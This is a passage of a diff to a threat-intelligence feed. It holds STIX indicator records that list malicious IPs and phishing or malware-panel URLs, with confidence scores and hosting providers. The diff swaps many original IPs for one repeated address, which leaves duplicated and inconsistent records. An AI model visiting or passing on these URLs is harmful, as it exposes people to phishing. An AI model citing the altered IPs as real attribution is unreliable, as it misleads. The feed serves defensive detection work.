CyberCrime","id":"indicator--3cac5b3d-ffa6-4f5c-b190-7de9eb2e5a00","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-08T14:02:59.432Z","name":"mal_ip: 8.209.78.16","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '8.209.78.16']","type":"indicator","valid_from":"2020-02-08T14:02:59.432Z"} +{"created":"2020-02-08T14:02:59.31Z","description":"TS ID: 55298071076; iType: mal_ip; State: active; Org: RouteLabel V.O.F.; Source: CyberCrime","id":"indicator--d74f403a-0673-4594-a4fc-61a22ab7fa21","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-30"],"modified":"2020-02-08T14:02:59.31Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-08T14:02:59.31Z"} +{"created":"2020-02-08T14:02:59.432Z","description":"TS ID: 55298069175; iType: mal_ip; State: active; Org: Alibaba.com Singapore E-Commerce Private Limited; Source: CyberCrime","id":"indicator--3cac5b3d-ffa6-4f5c-b190-7de9eb2e5a00","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-08T14:02:59.432Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-08T14:02:59.432Z"} {"created":"2020-02-08T14:03:17.953Z","description":"TS ID: 55298072311; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--86c43dc8-a27e-4f30-a29e-ba174f0a03ef","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-71"],"modified":"2020-02-08T14:03:17.953Z","name":"mal_url: http://bacanacabana.com.br/wp-includes/css/kay/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://bacanacabana.com.br/wp-includes/css/kay/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-08T14:03:17.953Z"} {"created":"2020-02-08T14:03:21.626Z","description":"TS ID: 55298071960; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--d900b770-4f2f-4597-ba97-a3e62646eca8","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-08T14:03:21.626Z","name":"mal_url: http://xgkxc.xyz/P3/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://xgkxc.xyz/P3/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-08T14:03:21.626Z"} {"created":"2020-02-08T14:03:23.941Z","description":"TS ID: 55298070427; iType: mal_url; State: active; Org: SBCLOUD; Source: CyberCrime","id":"indicator--be5fb697-b554-4042-8185-f4148a5d02a2","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-93"],"modified":"2020-02-08T14:03:23.941Z","name":"mal_url: http://boomcoins.ml/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://boomcoins.ml/login']","type":"indicator","valid_from":"2020-02-08T14:03:23.941Z"} {"created":"2020-02-08T14:03:34.136Z","description":"TS ID: 55298071042; iType: mal_url; State: active; Org: RouteLabel V.O.F.; Source: CyberCrime","id":"indicator--31a6a6c3-f385-421f-9ebb-d5cdced1dfd5","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-30"],"modified":"2020-02-08T14:03:34.136Z","name":"mal_url: http://asstubevideos.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://asstubevideos.com/login']","type":"indicator","valid_from":"2020-02-08T14:03:34.136Z"} {"created":"2020-02-08T14:03:34.507Z","description":"TS ID: 55298069289; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--8c9846cd-2a0b-40c3-91f2-5893c05b1560","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-02-08T14:03:34.507Z","name":"mal_url: http://f0397413.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0397413.xsph.ru/login']","type":"indicator","valid_from":"2020-02-08T14:03:34.507Z"} -{"created":"2020-02-08T14:03:42.075Z","description":"TS ID: 55298071476; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--4e5ac673-3459-45d1-817e-d7aca2850c5e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-08T14:03:42.075Z","name":"mal_ip: 45.145.0.14","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '45.145.0.14']","type":"indicator","valid_from":"2020-02-08T14:03:42.075Z"} +{"created":"2020-02-08T14:03:42.075Z","description":"TS ID: 55298071476; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--4e5ac673-3459-45d1-817e-d7aca2850c5e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-08T14:03:42.075Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-08T14:03:42.075Z"} {"created":"2020-02-08T14:03:42.298Z","description":"TS ID: 55298069324; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--8d463a9a-c285-4af6-91e8-bfd7e65d820f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-70"],"modified":"2020-02-08T14:03:42.298Z","name":"mal_url: http://f0396512.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0396512.xsph.ru/login']","type":"indicator","valid_from":"2020-02-08T14:03:42.298Z"} {"created":"2020-02-08T14:03:46.901Z","description":"TS ID: 55298070290; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime","id":"indicator--bf76b431-6b24-4b63-89d6-4f026a2e5169","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-63"],"modified":"2020-02-08T14:03:46.901Z","name":"mal_url: http://j1043204.myjino.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://j1043204.myjino.ru/login']","type":"indicator","valid_from":"2020-02-08T14:03:46.901Z"} {"created":"2020-02-08T14:03:47.108Z","description":"TS ID: 55298069358; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--646c9b00-80f7-4457-b2bc-1da854c211d6","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-72"],"modified":"2020-02-08T14:03:47.108Z","name":"mal_url: http://f0387320.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0387320.xsph.ru/login']","type":"indicator","valid_from":"2020-02-08T14:03:47.108Z"} @@ -395,24 +395,24 @@ {"created":"2020-02-08T14:03:58.41Z","description":"TS ID: 55298072652; iType: mal_url; State: active; Org: Netrouting; Source: CyberCrime","id":"indicator--84dceb2a-fb38-4d98-9005-7f05460e8f3a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-48"],"modified":"2020-02-08T14:03:58.41Z","name":"mal_url: http://209.182.217.85/auth.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://209.182.217.85/auth.php']","type":"indicator","valid_from":"2020-02-08T14:03:58.41Z"} {"created":"2020-02-08T14:04:30.627Z","description":"TS ID: 55298073012; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime","id":"indicator--ca97a773-4de3-4c9d-8f4c-b7350a615c45","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-08T14:04:30.627Z","name":"mal_url: http://fentq.org/x/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://fentq.org/x/panel/admin.php']","type":"indicator","valid_from":"2020-02-08T14:04:30.627Z"} {"created":"2020-02-08T14:04:30.659Z","description":"TS ID: 55298072708; iType: mal_url; State: active; Org: Tencent Cloud Computing (Beijing) Co.; Source: CyberCrime","id":"indicator--d0653208-3d17-48c8-a47d-a6dede383ad8","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-08T14:04:30.659Z","name":"mal_url: http://castmart.ga/~zadmin/beta/aps/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://castmart.ga/~zadmin/beta/aps/login.php']","type":"indicator","valid_from":"2020-02-08T14:04:30.659Z"} -{"created":"2020-02-08T14:04:30.733Z","description":"TS ID: 55298072377; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--7873494f-24fb-42a6-ae17-299b9825e220","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-22"],"modified":"2020-02-08T14:04:30.733Z","name":"mal_ip: 162.241.6.97","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '162.241.6.97']","type":"indicator","valid_from":"2020-02-08T14:04:30.733Z"} +{"created":"2020-02-08T14:04:30.733Z","description":"TS ID: 55298072377; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--7873494f-24fb-42a6-ae17-299b9825e220","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-22"],"modified":"2020-02-08T14:04:30.733Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-08T14:04:30.733Z"} {"created":"2020-02-08T14:04:30.81Z","description":"TS ID: 55298072245; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--14e760f3-eb76-412c-ab7b-8267bd65deb5","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-02-08T14:04:30.81Z","name":"mal_url: http://hanmha.com/drunk/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://hanmha.com/drunk/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-08T14:04:30.81Z"} {"created":"2020-02-08T14:04:30.84Z","description":"TS ID: 55298072104; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--8a5aa5ab-e8ec-4641-9cfb-179df3bede39","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-08T14:04:30.84Z","name":"mal_url: http://trouserlanditd.com/dabs/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://trouserlanditd.com/dabs/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-08T14:04:30.84Z"} -{"created":"2020-02-08T14:04:30.927Z","description":"TS ID: 55298071479; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--5bbb8e55-9eb7-4b8a-a7aa-d79c53a0e596","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-08T14:04:30.927Z","name":"mal_url: http://45.145.0.14/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://45.145.0.14/login']","type":"indicator","valid_from":"2020-02-08T14:04:30.927Z"} +{"created":"2020-02-08T14:04:30.927Z","description":"TS ID: 55298071479; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--5bbb8e55-9eb7-4b8a-a7aa-d79c53a0e596","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-08T14:04:30.927Z","name":"mal_url: http://89.160.20.156/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/login']","type":"indicator","valid_from":"2020-02-08T14:04:30.927Z"} {"created":"2020-02-08T14:04:35.541Z","description":"TS ID: 55298071733; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--cd3bea2d-dd64-463e-ae03-2a582c2261f2","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-55"],"modified":"2020-02-08T14:04:35.541Z","name":"mal_url: http://trust-oot.info/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://trust-oot.info/login']","type":"indicator","valid_from":"2020-02-08T14:04:35.541Z"} -{"created":"2020-02-08T14:04:35.641Z","description":"TS ID: 55298069948; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--543aeaab-e5f0-42bc-afa5-6cd3cc9a26ec","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-08T14:04:35.641Z","name":"mal_ip: 217.8.117.66","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '217.8.117.66']","type":"indicator","valid_from":"2020-02-08T14:04:35.641Z"} -{"created":"2020-02-08T14:04:37.657Z","description":"TS ID: 55298071095; iType: mal_url; State: active; Org: RouteLabel V.O.F.; Source: CyberCrime","id":"indicator--d2987902-59e6-4667-b011-f20e93e283d9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-30"],"modified":"2020-02-08T14:04:37.657Z","name":"mal_url: http://81.4.100.75/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://81.4.100.75/login']","type":"indicator","valid_from":"2020-02-08T14:04:37.657Z"} +{"created":"2020-02-08T14:04:35.641Z","description":"TS ID: 55298069948; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--543aeaab-e5f0-42bc-afa5-6cd3cc9a26ec","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-08T14:04:35.641Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-08T14:04:35.641Z"} +{"created":"2020-02-08T14:04:37.657Z","description":"TS ID: 55298071095; iType: mal_url; State: active; Org: RouteLabel V.O.F.; Source: CyberCrime","id":"indicator--d2987902-59e6-4667-b011-f20e93e283d9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-30"],"modified":"2020-02-08T14:04:37.657Z","name":"mal_url: http://89.160.20.156/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/login']","type":"indicator","valid_from":"2020-02-08T14:04:37.657Z"} {"created":"2020-02-08T14:04:41.785Z","description":"TS ID: 55298072117; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--093718d8-bb0e-4816-ab4b-c97cb95d5531","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-61"],"modified":"2020-02-08T14:04:41.785Z","name":"mal_url: http://serviciotecnicoenperu.com/contactar/zz/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://serviciotecnicoenperu.com/contactar/zz/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-08T14:04:41.785Z"} {"created":"2020-02-08T14:04:43.759Z","description":"TS ID: 55298071859; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--dfdca2f0-75cc-4e33-9045-e2ba136c0183","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-08T14:04:43.759Z","name":"mal_url: http://xgkxc.xyz/P4/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://xgkxc.xyz/P4/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-08T14:04:43.759Z"} {"created":"2020-02-08T14:04:43.783Z","description":"TS ID: 55298070283; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--0e501865-d0a0-493b-8302-02efe0f2c5d1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-08T14:04:43.783Z","name":"mal_url: http://kmfjlool.xyz/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://kmfjlool.xyz/login']","type":"indicator","valid_from":"2020-02-08T14:04:43.783Z"} -{"created":"2020-02-09T05:09:33.689Z","description":"TS ID: 55300025372; iType: mal_ip; State: active; Org: Alibaba; Source: CyberCrime","id":"indicator--91f46249-8fa5-4e88-bb38-0448b08b5448","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-02-09T05:09:33.689Z","name":"mal_ip: 147.139.139.206","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '147.139.139.206']","type":"indicator","valid_from":"2020-02-09T05:09:33.689Z"} +{"created":"2020-02-09T05:09:33.689Z","description":"TS ID: 55300025372; iType: mal_ip; State: active; Org: Alibaba; Source: CyberCrime","id":"indicator--91f46249-8fa5-4e88-bb38-0448b08b5448","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-02-09T05:09:33.689Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-09T05:09:33.689Z"} {"created":"2020-02-10T02:01:30.459Z","description":"TS ID: 55303483956; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--07925c70-b345-4aa6-8f40-e19602cf0429","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-10T02:01:30.459Z","name":"mal_url: http://pentestblog.xyz/panel/login/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://pentestblog.xyz/panel/login/']","type":"indicator","valid_from":"2020-02-10T02:01:30.459Z"} {"created":"2020-02-10T02:01:36.571Z","description":"TS ID: 55303483889; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--00195f28-4745-41a3-9710-7e2266b1270e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-74"],"modified":"2020-02-10T02:01:36.571Z","name":"mal_url: http://f0386817.xsph.ru/32cd6120/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0386817.xsph.ru/32cd6120/login.php']","type":"indicator","valid_from":"2020-02-10T02:01:36.571Z"} {"created":"2020-02-10T02:01:36.621Z","description":"TS ID: 55303483880; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--eae0ef0b-3b77-401b-8835-4ad9cb97171d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-70"],"modified":"2020-02-10T02:01:36.621Z","name":"mal_url: http://f0395086.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0395086.xsph.ru/login']","type":"indicator","valid_from":"2020-02-10T02:01:36.621Z"} -{"created":"2020-02-10T02:02:06.427Z","description":"TS ID: 55303483638; iType: mal_url; State: active; Org: Choopa, LLC; Source: CyberCrime","id":"indicator--05d25a1d-cf55-4b36-93ee-dbf618980b2f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-44"],"modified":"2020-02-10T02:02:06.427Z","name":"mal_url: http://45.76.237.80/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://45.76.237.80/panel/admin.php']","type":"indicator","valid_from":"2020-02-10T02:02:06.427Z"} +{"created":"2020-02-10T02:02:06.427Z","description":"TS ID: 55303483638; iType: mal_url; State: active; Org: Choopa, LLC; Source: CyberCrime","id":"indicator--05d25a1d-cf55-4b36-93ee-dbf618980b2f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-44"],"modified":"2020-02-10T02:02:06.427Z","name":"mal_url: http://89.160.20.156/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/panel/admin.php']","type":"indicator","valid_from":"2020-02-10T02:02:06.427Z"} {"created":"2020-02-10T02:02:14.887Z","description":"TS ID: 55303483942; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--9af2b6ee-aec5-481a-8e93-2a7153fcf05e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-02-10T02:02:14.887Z","name":"mal_url: http://worldatdoor.in/wire/32/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://worldatdoor.in/wire/32/panel/admin.php']","type":"indicator","valid_from":"2020-02-10T02:02:14.887Z"} {"created":"2020-02-10T02:02:16.263Z","description":"TS ID: 55303483899; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime","id":"indicator--1641ace0-37a5-4364-8400-e422b5cdbcec","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-64"],"modified":"2020-02-10T02:02:16.263Z","name":"mal_url: http://wwe23pro.myjino.ru/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://wwe23pro.myjino.ru/login.php']","type":"indicator","valid_from":"2020-02-10T02:02:16.263Z"} -{"created":"2020-02-10T02:02:35.848Z","description":"TS ID: 55303483868; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--3e09e501-0b80-4de6-b5a9-1d30b5687a24","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-44"],"modified":"2020-02-10T02:02:35.848Z","name":"mal_ip: 2.59.117.6","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '2.59.117.6']","type":"indicator","valid_from":"2020-02-10T02:02:35.848Z"} +{"created":"2020-02-10T02:02:35.848Z","description":"TS ID: 55303483868; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--3e09e501-0b80-4de6-b5a9-1d30b5687a24","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-44"],"modified":"2020-02-10T02:02:35.848Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-10T02:02:35.848Z"} {"created":"2020-02-10T02:02:45.419Z","description":"TS ID: 55303483940; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--85ab9568-e7f5-40c6-935d-8bdbe263970c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-65"],"modified":"2020-02-10T02:02:45.419Z","name":"mal_url: http://garex.xyz/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://garex.xyz/login']","type":"indicator","valid_from":"2020-02-10T02:02:45.419Z"} {"created":"2020-02-10T02:02:47.096Z","description":"TS ID: 55303483952; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime","id":"indicator--05509090-9cd9-43b0-892c-02318134a893","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-58"],"modified":"2020-02-10T02:02:47.096Z","name":"mal_url: http://jerichoconstructioncompany.com/wps/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://jerichoconstructioncompany.com/wps/panel/admin.php']","type":"indicator","valid_from":"2020-02-10T02:02:47.096Z"} {"created":"2020-02-10T02:02:55.786Z","description":"TS ID: 55303483873; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--c884bffa-1248-483b-bdf8-dada05340ea4","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-71"],"modified":"2020-02-10T02:02:55.786Z","name":"mal_url: http://f0396079.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0396079.xsph.ru/login']","type":"indicator","valid_from":"2020-02-10T02:02:55.786Z"} @@ -427,43 +427,43 @@ {"created":"2020-02-11T02:07:49.317Z","description":"TS ID: 55306531320; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--782c926c-e92f-451e-8aaf-dbe446b8abe4","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-76"],"modified":"2020-02-11T02:07:49.317Z","name":"mal_url: http://klickus.com/okye/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://klickus.com/okye/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-11T02:07:49.317Z"} {"created":"2020-02-11T02:07:49.341Z","description":"TS ID: 55306531298; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--336d437c-cb0b-473c-b157-3edad63d3a65","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-76"],"modified":"2020-02-11T02:07:49.341Z","name":"mal_url: http://klickus.com/gozie/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://klickus.com/gozie/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-11T02:07:49.341Z"} {"created":"2020-02-12T02:02:34.926Z","description":"TS ID: 55309106417; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--1fff5727-69fd-4477-a610-3542e53642ae","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-12T02:02:34.926Z","name":"mal_url: http://alwaysdelivery.xyz/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://alwaysdelivery.xyz/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-12T02:02:34.926Z"} -{"created":"2020-02-12T02:03:19.477Z","description":"TS ID: 55309106235; iType: mal_url; State: active; Org: VoenTelecom nets; Source: CyberCrime","id":"indicator--8c3385b7-6ee5-4699-87c8-7a7b1da9b6aa","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-49"],"modified":"2020-02-12T02:03:19.477Z","name":"mal_url: http://188.227.85.53/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://188.227.85.53/panel/admin.php']","type":"indicator","valid_from":"2020-02-12T02:03:19.477Z"} -{"created":"2020-02-13T02:02:41.467Z","description":"TS ID: 55311776075; iType: mal_ip; State: active; Org: Shinjiru Technology Sdn Bhd; Source: CyberCrime","id":"indicator--91ef9dde-3f0a-472c-b8ec-a1b9951acb50","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-02-13T02:02:41.467Z","name":"mal_ip: 111.90.142.42","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '111.90.142.42']","type":"indicator","valid_from":"2020-02-13T02:02:41.467Z"} +{"created":"2020-02-12T02:03:19.477Z","description":"TS ID: 55309106235; iType: mal_url; State: active; Org: VoenTelecom nets; Source: CyberCrime","id":"indicator--8c3385b7-6ee5-4699-87c8-7a7b1da9b6aa","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-49"],"modified":"2020-02-12T02:03:19.477Z","name":"mal_url: http://89.160.20.156/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/panel/admin.php']","type":"indicator","valid_from":"2020-02-12T02:03:19.477Z"} +{"created":"2020-02-13T02:02:41.467Z","description":"TS ID: 55311776075; iType: mal_ip; State: active; Org: Shinjiru Technology Sdn Bhd; Source: 